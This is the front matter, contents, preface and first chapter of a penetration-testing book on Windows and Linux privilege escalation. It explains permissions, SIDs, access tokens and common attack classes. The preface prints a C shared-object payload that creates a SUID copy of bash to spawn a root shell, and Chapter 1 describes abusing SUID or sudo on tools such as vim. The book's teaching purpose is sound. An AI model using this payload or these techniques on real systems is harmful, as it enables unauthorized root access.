TITLE: privilege-escalation-techniques
ISBN: 9781801078870
FILES: 21


===== FILE 2/21: B17389_FM_Final_PG_ePub.xhtml =====

Privilege Escalation Techniques

Learn the art of exploiting Windows and Linux systems

Alexis Ahmed

BIRMINGHAM—MUMBAI

Privilege Escalation Techniques

Copyright © 2021 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Group Product Manager: Vijin Boricha

Publishing Product Manager: Vijin Boricha

Senior Editor: Shazeen Iqbal

Content Development Editor: Romy Dias

Technical Editor: Shruthi Shetty

Copy Editor: Safis Editing

Project Coordinator: Shagun Saini

Proofreader: Safis Editing

Indexer: Manju Arasan

Production Designer: Prashant Ghare

First published: October 2021

Production reference: 1061021

Published by Packt Publishing Ltd.

Livery Place

35 Livery Street

Birmingham

B3 2PB, UK.

ISBN 978-1-80107-887-0

www.packt.com

In loving memory of my late grandfather.

Contributors
About the author

Alexis Ahmed is an experienced penetration tester and security researcher with over 7 years of experience in the cybersecurity industry. He started off his career as a Linux system administrator and soon discovered a passion and aptitude for security and transitioned into a junior penetration tester. In 2017, he founded HackerSploit, a cybersecurity consultancy that specializes in penetration testing and security training, where he currently works as a senior penetration tester and trainer.

Alexis has multiple cybersecurity certifications, ranging from the CEH and Sec+ to OSCP, and is a certified ISO 27001 associate. He is also an experienced DevSecOps engineer and helps companies secure their Docker infrastructure.

I would like to thank my family for giving me the space and support I've needed to write this book, even while the COVID-19 global pandemic was raging around us. I would like to thank the entire Packt editing team, which has helped, guided, and encouraged me during this process, and I'd like to give special thanks to Romy Dias, who edited most of my work, and Andy Portillo, who helped me with the technical aspects of the book.

About the reviewer

Andy Portillo (n3t1nv4d3) holds an MS in information assurance and cybersecurity. He holds several certifications ranging from Offensive Security's OSCP and OSWP to Pentester Academy's CRTE and CARTP, ISC² CISSP, SANS GWAPT, and GEVA, and ISACA's CISA and CDPSE. Andy has 8 years of experience in a wide range of information security disciplines and has industry experience in finance, payment cards, and academia. His career started as a network engineer before gaining extensive information security experience through roles including IS analyst and penetration tester, and he is currently working as a manager in a SecOps (vapt) team and lecturer at the University of Southern California. Above all the previously stated, he is a father, husband, and hacker!

To my wife and kids, thank you for your understanding and patience with me as I continue down my ever-growing learning paths and venture into a multitude of information security areas – working, teaching, studying, and now reviewing books.

===== FILE 3/21: B17389_TOC_Final_PG_ePub.xhtml =====

Table of Contents
Preface
Section 1: Gaining Access and Local Enumeration
Chapter 1: Introduction to Privilege Escalation
What is privilege escalation?
How permissions and privileges are assigned
Horizontal privilege escalation
Vertical privilege escalation
Understanding the differences between privilege escalation on Windows and Linux
Windows security
Linux security
Exploring the types of privilege escalation attack
Kernel exploits
Exploiting SUID binaries
Exploiting vulnerable services and permissions
Insecure credentials
Exploiting SUDO
Summary
Chapter 2: Setting Up Our Lab
Technical requirements
Designing our lab
Virtualization
Hypervisors
Lab structure
Building our lab
Installing and configuring VirtualBox
Configuring a virtual network
Setting up our target virtual machines
Setting up Kali Linux
Putting it all together
Summary
Chapter 3: Gaining Access (Exploitation)
Technical requirements
Setting up Metasploit
The Metasploit structure
Setting up the Metasploit framework
Information gathering and footprinting
Network mapping with Nmap
Vulnerability assessment
Gaining access
Exploiting Metasploitable3
Exploiting Metasploitable2
Summary
Chapter 4: Performing Local Enumeration
Technical requirements
Understanding the enumeration process
Windows enumeration
System enumeration
User and group enumeration
Network enumeration
Password enumeration
Firewall and antivirus enumeration
Automated enumeration tools
Linux enumeration
System enumeration
User and group enumeration
Network enumeration
Automated enumeration tools
Summary
Section 2: Windows Privilege Escalation
Chapter 5: Windows Kernel Exploits
Technical requirements
Understanding kernel exploits
What is a kernel?
Windows NT
The Windows kernel exploitation process
Kernel exploitation with Metasploit
Manual kernel exploitation
Local enumeration
Transferring files
Enumerating kernel exploits
Compiling Windows exploits
Running the kernel exploit
Summary
Chapter 6: Impersonation Attacks
Technical requirements
Understanding Windows access tokens
Windows access tokens
Token security levels
Abusing tokens
Enumerating privileges
Token impersonation attacks
Potato attacks overview
Escalating privileges via a Potato attack
Manual escalation
Summary
Chapter 7: Windows Password Mining
Technical requirements
What is password mining?
Searching for passwords in files
Searching for passwords in Windows configuration files
Searching for application passwords
Dumping Windows hashes
SAM database
LM and NTLM hashing
Cracking Windows hashes
Cracking Windows hashes with John the Ripper
Authentication
Summary
Chapter 8: Exploiting Services
Technical requirements
Exploiting services and misconfigurations
Exploiting unquoted service paths
Exploiting secondary logon
Exploiting weak service permissions
DLL hijacking
Setting up our environment
The DLL exploitation process
Summary
Chapter 9: Privilege Escalation through the Windows Registry
Technical requirements
Understanding the Windows Registry
What is the Windows Registry?
How the Windows Registry stores data
Exploiting Autorun programs
Exploiting the Always Install Elevated feature
Exploiting weak registry permissions
Summary
Section 3: Linux Privilege Escalation
Chapter 10: Linux Kernel Exploits
Technical requirements
Understanding the Linux kernel
Understanding the Linux kernel exploitation process
Setting up our environment
Kernel exploitation with Metasploit
Manual kernel exploitation
Local enumeration tools
Transferring files
Enumerating system information
Enumerating kernel exploits
Running the kernel exploit
Summary
Chapter 11: Linux Password Mining
Technical requirements
What is password mining?
Setting up our environment
Extracting passwords from memory
Searching for passwords in configuration files
Searching for passwords
Transferring files
Searching for passwords in history files
Summary
Chapter 12: Scheduled Tasks
Technical requirements
Introduction to cron jobs
The crontab file
Escalation via cron paths
Enumeration with linPEAS
Transferring files
Finding cron jobs with linPEAS
Escalating privileges via cron paths
Escalation via cron wildcards
Escalation via cron file overwrites
Summary
Chapter 13: Exploiting SUID Binaries
Technical requirements
Introduction to filesystem permissions on Linux
Changing permissions
Understanding SUID permissions
Searching for SUID binaries
Searching for SUID binaries manually
Searching for SUID binaries with linPEAS
Identifying vulnerable SUID binaries
Escalation via shared object injection
Summary
Other Books You May Enjoy

===== FILE 4/21: B17389_Preface_Final_PG_ePub.xhtml =====

Preface

This book is a comprehensive guide on the privilege escalation process for Windows and Linux systems and is designed to be practical and hands-on by providing you with real-world exercises and scenarios in the form of vulnerable environments and virtual machines. The book starts off by introducing you to privilege escalation and covers the process of setting up a hands-on virtual hacking lab that will be used to demonstrate the practical aspects of the techniques covered during the course of this book. Each chapter of this book builds on the previous chapter and validates the learning process by providing you with exercises and scenarios that you can replicate.

You will learn how to enumerate as much information as possible from a target system, utilize manual and automated enumeration tools, elevate privileges on Windows systems by leveraging various techniques, such as impersonation attacks or kernel exploits, among many others, and elevate privileges on Linux systems through the use of kernel exploits or by exploiting SUID binaries.

This book is sorted into three sections that build on each other, whereby the first section covers the introduction to privilege escalation, the process of obtaining the initial foothold on a target system, and enumerating information from target systems. The next two sections are dedicated to covering the various privilege escalation techniques and tools for both Windows and Linux systems.

This book will provide you with the necessary skills to enumerate information from target systems, identify potential vulnerabilities, and utilize manual techniques or automated tools in order to elevate their privileges on the target system.

Who this book is for

This book is designed for students, cyber security professionals, enthusiasts, security engineers, penetration testers, or for anyone who has a keen interest in penetration testing or information security. This book can be used as study material for individuals, companies, or training organizations.

Regardless of whether you're a student new to the information technology industry or a seasoned professional, this book has something to offer and is packed with useful information that you can use to improve your penetration testing skills.

What this book covers

Chapter 1, Introduction to Privilege Escalation, introduces you to the privilege escalation process, the various types of privilege escalation attacks, and the differences between privilege escalation on Windows and Linux.

Chapter 2, Setting Up Our Lab, introduces you to the concept of virtualization, how to build your own penetration testing lab, how to set up vulnerable virtual machines, and installing and configuring Kali Linux.

Chapter 3, Gaining Access (Exploitation), focuses on the process of setting up the Metasploit framework, performing information gathering with Nmap, identifying vulnerabilities, and exploiting them to gain access to a system.

Chapter 4, Performing Local Enumeration, covers the process of enumerating information from Windows and Linux systems manually and automatically.

Chapter 5, Windows Kernel Exploits, explores the process of performing kernel exploitation manually and automatically with Metasploit in order to elevate your privileges.

Chapter 6, Impersonation Attacks, explains how Windows access tokens work, outlines the process of enumerating privileges, explains token impersonation attacks, and covers the process of elevating your privileges via the Rotten Potato attack.

Chapter 7, Windows Password Mining, explores the process of searching for passwords in files and Windows configuration files, searching for application passwords, dumping Windows hashes, and cracking dumped password hashes in order to elevate your privileges.

Chapter 8, Exploiting Services, covers the process of exploiting unquoted service paths, exploiting the secondary logon handle, exploiting weak service permissions, and performing DLL hijacking.

Chapter 9, Privilege Escalation through the Windows Registry, examines the process of exploiting weak registry permissions, autorun programs, and exploiting the Always Install Elevated feature.

Chapter 10, Linux Kernel Exploits, explains the workings of the Linux kernel and covers the process of performing kernel exploitation both manually and automatically with Metasploit.

Chapter 11, Linux Password Mining, focuses on the process of extracting passwords from memory, searching for passwords in configuration files, and searching for passwords in Linux history files.

Chapter 12, Scheduled Tasks, introduces you to cron jobs on Linux and covers the process of escalating your privileges by exploiting cron paths, cron wildcards, and cron file overwrites.

Chapter 13, Exploiting SUID Binaries, outlines how filesystem permissions on Linux work and explores the process of searching for SUID binaries and elevating your privileges through the use of shared object injection.

To get the most out of this book

To get the most out of this book, you should have a fundamental understanding of networking, specifically TCP/IP, UDP, and their respective protocols. Furthermore, given the nature of the techniques covered in the book, you should have basic familiarity with the workings and functionality of Windows and Linux.

The hardware required to follow the techniques and exploits in this book is fairly standard. You can use a laptop or desktop computer that supports virtualization and is capable of running Oracle VirtualBox. As per the hardware and operating system specifications, the following configuration is recommended:

Operating system (Windows): Windows 7 or later, preferably 64-bit
Operating system (Linux): Ubuntu, Debian, Fedora, or any stable distribution based on Debian or Fedora
Processor: Intel i5 or higher
RAM: 8 GB or higher
HDD: 500 GB hard drive

If you are using the digital version of this book, we advise you to type the code yourself or access the code from the book's GitHub repository (a link is available in the next section). Doing so will help you avoid any potential errors related to the copying and pasting of code.

Code in Action

The Code in Action videos for this book can be viewed at https://bit.ly/3CPN0DU.

Download the color images

We also provide a PDF file that has color images of the screenshots and diagrams used in this book. You can download it here: https://static.packt-cdn.com/downloads/9781801078870_ColorImages.pdf.

Conventions used

There are a number of text conventions used throughout this book.

Code in text: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "After downloading the Bash script to our Kali VM, we need to transfer the linpeas.sh file to our target virtual machine."

A block of code is set as follows:

#include <stdio.h>

#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {

system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");

}

When we wish to draw your attention to a particular part of a code block, the relevant lines or items are set in bold:

#include <stdio.h>

#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {

system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");

}

Any command-line input or output is written as follows:

ls -al /home/user/

Bold: Indicates a new term, an important word, or words that you see onscreen. For instance, words in menus or dialog boxes appear in bold. Here is an example: "Select System info from the Administration panel."

Tips or important notes

Appear like this.

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, email us at customercare@packtpub.com and mention the book title in the subject of your message.

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/support/errata and fill in the form.

Piracy: If you come across any illegal copies of our works in any form on the internet, we would be grateful if you would provide us with the location address or website name. Please contact us at copyright@packt.com with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.

Share Your Thoughts

Once you've read Privilege Escalation Techniques, we'd love to hear your thoughts! Please click here to go straight to the Amazon review page for this book and share your feedback.

Your review is important to us and the tech community and will help us make sure we're delivering excellent quality content.

===== FILE 5/21: B17389_Section1_Final_PG_ePub.xhtml =====

Section 1: Gaining Access and Local Enumeration

This section will give you an introduction to the privilege escalation process and will cover the process of gaining an initial foothold on the target system and how to perform local enumeration on target systems in order to identify potential vulnerabilities.

The following chapters are included in this section:

Chapter 1, Introduction to Privilege Escalation
Chapter 2, Setting Up Our Lab
Chapter 3, Gaining Access (Exploitation)
Chapter 4, Performing Local Enumeration

===== FILE 6/21: B17389_01_Final_PG_ePub.xhtml =====

Chapter 1: Introduction to Privilege Escalation

Privilege escalation is a vital element of the attack life cycle and is a major determinant in the overall success of a penetration test.

The importance of privilege escalation in the penetration testing process cannot be overstated or overlooked. Developing your privilege escalation skills will mark you out as a good penetration tester. The ability to enumerate information from a target system and utilize this information to identify potential misconfigurations and vulnerabilities that can be exploited to elevate privileges is an essential skill set for any penetration tester.

This chapter aims to give you a clearer picture and understanding of the privilege escalation process and will act as a formal introduction to the various types of privilege escalation techniques, and how the process differs between Windows and Linux systems.

To fully understand and leverage the various privilege escalation tools and techniques, you first need to understand how permissions and privileges are implemented on various operating systems and how these differences in design and implementation affect the privilege escalation process as a whole.

By the end of this chapter, you will have a clear understanding of what privilege escalation is, and you will also understand how permissions are implemented on Windows and Linux systems and get a brief introduction to the various privilege escalation techniques that we will be exploring in depth in the upcoming chapters.

In this chapter, we will cover the following topics:

What is privilege escalation?
How permissions and privileges are assigned
Understanding the differences between privilege escalation on Windows and Linux
Exploring the types of privilege escalation attack
What is privilege escalation?

Privilege escalation is the process of exploiting vulnerabilities or misconfigurations in systems to elevate privileges from one user to another, typically to a user with administrative or root access on a system. Successful privilege escalation allows attackers to increase their control over a system or group of systems that belong to a domain, giving them the ability to make administrative changes, exfiltrate data, modify or damage the operating system, and maintain access through persistence, such as registry edits or cron jobs.

From a penetration tester's perspective, privilege escalation is the next logical step after the successful exploitation of a system and is typically performed by bypassing or exploiting authentication and authorization systems, whose purpose is to segregate user accounts based on their permissions and role.

A typical approach would be to use an initial access or foothold on a system to gain access to resources and functionality that is beyond what the current user account permissions offer. This process is commonly referred to as getting root privileges on a system.

Before we can get started with the various privilege escalation techniques, we need to understand how user accounts and permissions are implemented in modern operating systems.

How permissions and privileges are assigned

To better understand how to elevate privileges, we need to first understand how operating systems are designed in relation to user accounts and privilege.

Operating systems' authorizations are designed to handle multiple users with multiple roles and permissions. This segregation of roles is the primary factor behind the various user account implementation philosophies that are implemented in operating systems today.

This abstraction of user roles and permissions on a system is set up and facilitated by a system called a protection ring, as demonstrated in Figure 1.1. This specifies limits and enforces the functionality of users on a system and their corresponding access to resources.

As the name suggests, a protection ring is a hierarchical protection and segregation mechanism used to provide different levels of access to functionality and resources on a system. The various rings in the hierarchy represent layers of privilege within the operating system, as illustrated in the following screenshot:

Figure 1.1 – Protection ring

The rings in the hierarchy illustrated in Figure 1.1 are sorted and arranged from the most privileged (typically denoted by level 0) to the least privileged, where the least privileged is represented by the highest ring number. This segregation of privileges on a system leads to the adoption of two main roles, as follows:

Privileged access: This is typically represented or assigned to the root or administrator account and provides complete access to all system commands and resources. The root or administrator account will typically have access to the following functionality:

1. The ability to install, uninstall, and modify system software or binaries

2. The ability to add, modify, or remove users and user groups

3. The ability to create, access, modify, and delete any system or user data

4. The ability to access and have control over all system hardware

5. The ability to access network functionality and networking utilities

6. The ability to create, manage, and kill system and user processes

Unprivileged access: This is typically represented or assigned to non-root or standard user accounts and is limited to a specific set of privileges that are designed and tailored for standard user access on a system. It limits the user functionality to basic tasks and access of user data on the system. Non-root accounts will commonly have the following functionality:

1. The ability to start and stop user processes and programs

2. The ability to create, modify, and delete user data

3. The ability to have access to network functionality

This segregation of permissions highlights the importance of privilege escalation for penetration testers or attackers as it offers total and unparalleled control over a system or, potentially, a group of systems if they can get "root" or administrative access on a system.

Given the nature of privilege escalation attacks in relation to user accounts and permissions, there are two main methods of performing privilege escalation that can be utilized by attackers based on their intentions and objectives, as follows:

Horizontal privilege escalation
Vertical privilege escalation

We will take a closer look at what they are in the next section.

Horizontal privilege escalation

Horizontal privilege escalation is the process of accessing the functionality or data of other user accounts on a system, as opposed to gaining access to accounts with administrative or root privileges. It primarily involves accessing or authorizing functionality on a system using accounts that are on the same user level of permissions, as opposed to user accounts that are higher up and that have more privileges and permissions.

Attackers or penetration testers would typically perform this type of privilege escalation attack if they were interested in accessing unprivileged user account data or in harvesting user account credentials or password hashes.

Scenario

The following screenshot illustrates a typical account setup on a computer, where we have two unprivileged users and one privileged user. In this case, the two unprivileged users are John and Mike, and the privileged user is Collin:

Figure 1.2 – Horizontal privilege escalation scenario

In this scenario, John is attempting to perform a typical horizontal privilege escalation attack by escalating his user account privileges to the account privileges of Mike. Note that John and Mike are on the same horizontal privilege level.

Figure 1.2 clearly outlines the sole objective of horizontal privilege escalation, the objective being to elevate privileges to user accounts that are on the same horizontal level as the user account performing the attack.

Vertical privilege escalation

Vertical privilege escalation is the process of exploiting a vulnerability in an operating system to gain root or administrative access on a system. This method is usually preferred by attackers and penetration testers as it offers the biggest payout given the permissions and functionality, as they now have total access and control over the system(s).

The following screenshot outlines a bottom-up approach to user account permissions and privileges, where the topmost account has the highest privileges, is the least accessible, and is typically assigned to system administrators. The lowest accounts are set up and configured to be used by standard users and services that require no administrative privileges as part of their daily tasks:

Figure 1.3 – Vertical privilege escalation

Figure 1.3 also illustrates a vertical approach to elevating privileges based on the user account and permissions for both Windows and Linux systems, the objective being to laterally move up the pecking order to the account with the highest privileges, therefore giving you complete access to the system.

Important note

Vertical privilege escalation may not solely emanate from the exploitation of a vulnerability within an operating system or service. It is common to find misconfigured systems and services that may allow non-administrative user accounts to run commands or binaries with administrative permissions. We will take a look at the various privilege escalation techniques in the upcoming chapters.

Scenario

The following screenshot illustrates a typical account setup on a computer, where we have two unprivileged users and one privileged user. In this case, the two unprivileged users are John and Mike, and the privileged user is Collin:

Figure 1.4 – Vertical privilege escalation scenario

For this scenario, Figure 1.4 illustrates a traditional vertical privilege escalation method where the user John is attempting to elevate privileges to the administrator account, which is Collin's account. If successful, John will get access to administrative privileges and will be able to access all user accounts and files, therefore giving him total access and control over the system. This scenario demonstrates the importance and potential impact of a successful vertical privilege escalation attack.

Now that we have an understanding of the two main privilege escalation methods and how they are orchestrated, we can begin taking a look at the various differences between privilege escalation on Windows and Linux.

Understanding the differences between privilege escalation on Windows and Linux

Now that we have a general understanding of how user accounts and permissions are implemented and have looked at the two main methods of performing privilege escalation, we can begin taking a look at the differences between Linux and Windows in the context of privilege escalation attacks and at how their individual design and development philosophies affect the privilege escalation process.

This nuanced approach will give us clarity on the strengths and weaknesses of both operating systems and their corresponding kernels in relation to vulnerabilities and potential exploitation.

The following table outlines common potential attack vectors for both operating systems and the services that can be exploited to elevate privileges:

Table 1.1 – Common potential attack vectors

To fully understand the differences between the two operating systems in terms of potential vulnerabilities and attack vectors, we need to understand how they handle authentication and security as this will give us an idea of where the security pitfalls exist. It is important to note, however, that the security differences between Windows and Linux boil down to their unique design philosophy.

Windows security

Windows is a proprietary operating system that is owned and developed by the Microsoft Corporation and controls a majority of the PC market share at about 93%, which means that most companies are likely to be running Windows clients for their end users and/or Windows Server deployments for their critical infrastructure.

For this reason, Windows is more likely to be running on employee laptops and workstations as it has a much more user-centered design (UCD) and philosophy. In order to understand the privilege escalation process on Windows, we need to understand how Windows manages and maintains system security. In order to do this, we will need to take a closer look at various components that are responsible for managing and maintaining authentication and security on Windows.

User authentication

Authentication is the process of verifying the identity of a user who is trying to access a system or system resource.

Authentication on most modern operating systems is typically enforced through a username and password combination; however, operating systems have begun implementing additional layers of authentication, in addition to implementing stronger encryption algorithms for user passwords.

Passwords and password hashes are usually a target for penetration testers, and we will take a look at how to dump system passwords and hashes later in the book.

User authentication on Windows is handled by the Windows Logon (Winlogon) process and Security Account Manager (SAM). SAM is a database that is used to manage and store user accounts on Windows systems.

Modern releases of Windows utilize the New Technology LAN Manager 2 (NTLM2) encryption protocol for password hashing and encryption, which is significantly stronger than the LAN Manager (LM) encryption protocol present in older versions of Windows.

Authentication onto domains on Windows is typically facilitated by authentication protocols such as Kerberos.

User identification

User identification is used to uniquely identify users on a system and is also used to establish a system of accountability, as actions performed on a system can be tracked down to the user who made or performed them. Understanding how identification works and is implemented on Windows is extremely useful in the privilege escalation process to identify users on a system, along with their roles and groups.

The process of user identification on Windows utilizes a security identifier (SID) for identification. Each user and group has a unique SID that consists of the components outlined in the following screenshot:

Figure 1.5 – Sample Windows SID

The different parameters from the preceding SID are discussed as follows:

SID String: S indicates that it's an SID string
Revision: Always set to 1; this refers to the structure revision number
Authority ID: Specifies who created or granted the SID, as follows:

- Null: 0

- World authority: 1

- Local authority: 2

- Creator authority: 3

- Non-unique authority: 4

- NT authority: 5

Subauthority ID/actual ID: Unique ID for the user, or comprises the domain identifier
RID: This stands for relative ID and is used in reference to other accounts to distinguish one user from another. Windows will have the following unique RIDs assigned to specific users. It is important to be able to identify privileged users based on their SID, as follows:

- Administrator: 500

- Guest user: 501

- Domain administrator: 512

- Domain computer: 515

You can enumerate the SIDs on a Windows system by running the following command in Command Prompt (CMD):

wmic useraccount get name,sid

This command will enumerate all user account SIDs on the system, as illustrated in the following screenshot. Pay close attention to the RIDs as they can be used to quickly identify administrator and guest accounts:

Figure 1.6 – Enumerating Windows SIDs

As displayed in Figure 1.6, we can identify user roles based on their RID, regardless of the account username. In this particular case, we have an administrator and guest account set up and they can be identified by their RID.

Access tokens

An access token is an object that describes and identifies the security context of a process or thread on a system. The access token is generated by the Winlogon process every time a user authenticates successfully, and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to the initial process (typically the userinit.exe process), after which all child processes will inherit a copy of the access token from their creator and will run under the same access token.

On Windows, an access token will comprise the following elements:

User SID
Group SID
Logon SID
Privileges assigned to the user or the user's group
Discretionary access control list (DACL) being used
Source of the access token

We can list out the access token of a user by running the following command in the CMD:

Whoami /priv

If the user is unprivileged, the access token will be restricted, as outlined in the following screenshot:

Figure 1.7 – Restricted access token

It is important to note that the user highlighted in Figure 1.7 has administrative privileges; however, the cmd.exe process uses an access token that restricts privileges. If we run cmd.exe as an administrator, the user's access token will be listed with all privileges, as outlined in the following screenshot:

Figure 1.8 – Privileged access token

Access tokens can be leveraged during the privilege escalation process through attacks such as primary access token manipulation attacks, which involve tricking a system into believing that a process belongs to a different user from the one who started the process. We will learn how to utilize this attack vector to escalate our privileges later in the book.

Linux security

Linux is a free and open source operating system that comprises the Linux kernel, which was developed by Linus Torvalds, and the GNU's Not Unix (GNU) toolkit, which is a collection of software and utilities that was originally started and developed by Richard Stallman. This combination of open source projects is what makes up the Linux operating system as a whole, and it is commonly referred to as GNU/Linux.

Typically, most individuals and companies are likely to be running Windows clients and will be using Linux for their critical infrastructure—for instance, mail servers, databases, web servers, and intrusion detection systems (IDSes). Given the nature and deployment of Linux servers in organizations, attacks will be much more likely to severely affect a company and cause major disruption.

User authentication

User account details on Linux are stored in a /etc/passwd file. This file contains the user account username, the user ID (UID), an encrypted password, a group ID (GID), and personal user information.

This file can be accessed by all users on the system, which means that any user on the system can retrieve the password hashes of other users on the system. This makes the hash-dumping process on Linux much more straightforward and opens the door to potential password-cracking attacks. Most older Linux distributions utilized the Message Digest Algorithm 5 (MD5) hashing algorithm, which is much easier to crack, and as a result, most newer distributions have begun utilizing and implementing the Secure Hash Algorithm 256 (SHA-256) encryption protocol, therefore making it much more difficult to crack the hashes.

Identification

User authentication on Linux is facilitated through the use of a username that corresponds to a unique UID, comprising a numeric value that is automatically assigned or manually assigned by a system administrator. The root account on Linux will always have a UID of 0.

This user information, along with the hashed user passwords, is stored in the /etc/passwd file.

Access tokens

Access tokens on Linux work in a similar way to how they work on Windows but are stored in memory (random-access memory, or RAM) and attached to processes when initialized.

The access token on Linux will contain the following information:

UID of the user account
GID/GIDs of the groups that the user is a member of
User privileges
Primary group UID
Access control list (ACL) entries

Now that we have an understanding of the various authentication and security components used on Windows and Linux, we can take a look at the various types of privilege escalation attack and how they exploit the aforementioned security mechanisms.

Exploring the types of privilege escalation attack

We can now explore the most common privilege escalation attacks and how they work. The objective is to get a basic picture of the types of privilege escalation attack available and to understand how they are exploited.

We will take a look at how to exploit these vulnerabilities in depth on both Windows and Linux systems in the upcoming chapters.

Kernel exploits

Kernel exploits are programs or binaries that affect both Windows and Linux and are designed to exploit vulnerabilities in the underlying kernel, to execute arbitrary code with elevated or "root" permissions.

The exploitation process is multi-faceted and requires a good amount of enumeration in order to determine the operating system version and installed patches or hotfixes, and consequently whether it is affected by any kernel exploits, after which the kernel exploit code can be retrieved through various exploit repositories such as exploit-db. The exploit code should then be inspected and customized based on the required parameters and functionality. After customization, the code can be compiled into a binary and transferred over to the target for execution. In some cases, the exploit code will need to be downloaded and compiled on the target if it relies on certain dependencies.

After successful compilation and execution of the binary, the kernel exploit will grant the attacker "root" access on the target system in the form of a shell prompt, where they can run commands on the system with "root" privileges.

In many cases, precompiled kernel exploits for Windows already exist online and can be downloaded and executed directly, therefore avoiding the compilation process altogether. However, it is very important to inspect and analyze the exploit code before compiling it, as exploits could contain malicious code or payloads.

Important note

Kernel exploits are extremely powerful; however, they can cause system crashes and kernel panics that can hinder the privilege escalation process and can cause damage to the system.

Exploiting SUID binaries

SUID is an inbuilt Linux feature that allows users to execute binaries and files with the permissions of other users.

This feature is commonly used to allow non-root accounts to run system utilities and binaries with root permissions. You can set the program or utility SUID permission with the owner as "root." This will allow the program or utility to run with "root" privileges whenever a non-root user executes it. Attackers can exploit or take advantage of SUID misconfigurations and run arbitrary commands as root.

For example, programs or binaries that allow the execution of arbitrary commands such as vim should not have their SUID owner set as "root," as non-root users can leverage the command execution functionality within vim to run commands with "root."

Exploiting vulnerable services and permissions

Services offer the largest threat surface for attackers, given the variability and diversity of programs and services that can be found running on Windows and Linux systems.

Attackers will typically aim to identify misconfigured or vulnerable services and programs that could facilitate the escalation of privileges. For example, on Linux systems, attackers will try to identify and exploit misconfigurations with cron jobs and leverage the functionality to execute arbitrary code or malicious binaries.

Exploiting vulnerable or insecure services on Windows typically involves embedding a payload in a service with administrative privileges. When the service is executed, it executes a payload with the administrative privileges, therefore allowing the binary to execute commands with "root" privileges.

Insecure credentials

This technique involves searching for insecure credentials that have been stored on a system by users or by carrying out a process of cracking weak user credentials. Many users—and even system administrators—note down passwords in cleartext in documents, spreadsheets, and configuration files for various service accounts. These files can be located by running specialized search queries with various command-line utilities.

An example of this is the use of the find command-line utility on Linux to locate files with specific extensions and filenames.

Exploiting SUDO

Attackers will usually target users who have SUDO privileges. SUDO allows users to run commands as another user, typically the root user.

SUDO privileges are usually configured manually by administrators, which leaves the door open to potential misconfigurations. For example, an administrator can assign SUDO permissions to a non-root user for certain command-line utilities (such as find or vim) that can run shell commands or arbitrary code.

This can be leveraged by attackers to run arbitrary code or execute commands with "root" privileges.

Important note

SUDO is a Linux command and permission set that allows users to run commands or programs with superuser or "root" privileges.

These are just some of the privilege escalation attacks and techniques that can be used on both Windows and Linux systems. We will be taking a look at how to use these techniques in detail in the upcoming chapters.

Summary

This chapter introduced you to the privilege escalation process, explained how privileges and user accounts are implemented in modern operating systems, and looked at the differences between privilege escalation on Windows and Linux systems. It also highlighted the most common privilege escalation techniques and explained how they can be exploited.

You should now have a good understanding of the privilege escalation process, how permissions and privileges are implemented, and the various penetration testing techniques that are used on both Windows and Linux.

In the next chapter, we'll get started with setting up our virtual environment and preparing our penetration-testing distribution. We will also look at the various tools and frameworks we will be utilizing to enhance and optimize the privilege escalation process.

===== FILE 7/21: B17389_02_Final_PG_ePub.xhtml =====

Chapter 2: Setting Up Our Lab

Given the robust and technical nature of the work that a security researcher or penetration tester indulges in, it is vitally important that you practice and test your hacking skills in a safe and isolated virtual environment to avoid causing damage to public systems, computers, or networks. The art of setting up a virtual hacking lab is an essential skill for a penetration tester, as it allows for the rapid deployment, testing, and exploitation of systems without having to target public systems or network infrastructures.

It is, therefore, vitally important to know how to set up a virtualized environment that can be used for practicing your penetration testing skills legally. Having a personal virtual hacking lab allows you to test out new attacks, exploits, and tools, and this, in turn, will enhance your learning process and will consistently build up your skill set making you a more competent hacker. Similarly, in this chapter, you will learn how to design and configure your own robust isolated virtual hacking lab, which will be used for learning and practicing the various exploitation and privilege escalation techniques on the Windows and Linux operating systems that are demonstrated in this book.

This chapter will give you the necessary knowledge and skills to design, deploy, configure, and troubleshoot your own isolated virtual hacking lab.

In this chapter, we will cover the following topics:

Designing our lab
Building our lab
Setting up Kali Linux
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you have met the following hardware and software requirements:

A Windows, Linux, or macOS-hosted operating system is required.
A minimum of 4 GB of RAM is required. 8 GB is the preferred specification.
More than 500 GB of free storage.
A processor that supports virtualization technology (for instance, Intel VT-x or AMD VT).
A general understanding of how VirtualBox works.

Now that we have an idea of what we will be covering, let's dive right into the first topic.

You can view this chapter's code in action here: https://bit.ly/3ukgh6C

Designing our lab

In this section, we will start building our virtual hacking lab. We will design and structure our lab based on our requirements for the exercises and demonstrations in this book.

To set up our lab infrastructure, we need to leverage virtualization technology. This will allow us to avoid any additional costs related to hardware and networking, as we will be running all of our guest operating systems and configuring our virtual network on one host.

Before we get started with designing and structuring our lab, we need to explore virtualization as a concept and as a practice. First, we will learn about the importance of and the role of virtualization in building and configuring our virtual hacking lab.

Virtualization

Virtualization is the process of running a virtualized instance of an operating system with an abstracted hardware layer. Virtualization facilitates the running of multiple operating systems on a single computer, or host, simultaneously. It was invented as a way to help large organizations and companies reduce their need for and expenditure on hardware for hosting and networking equipment.

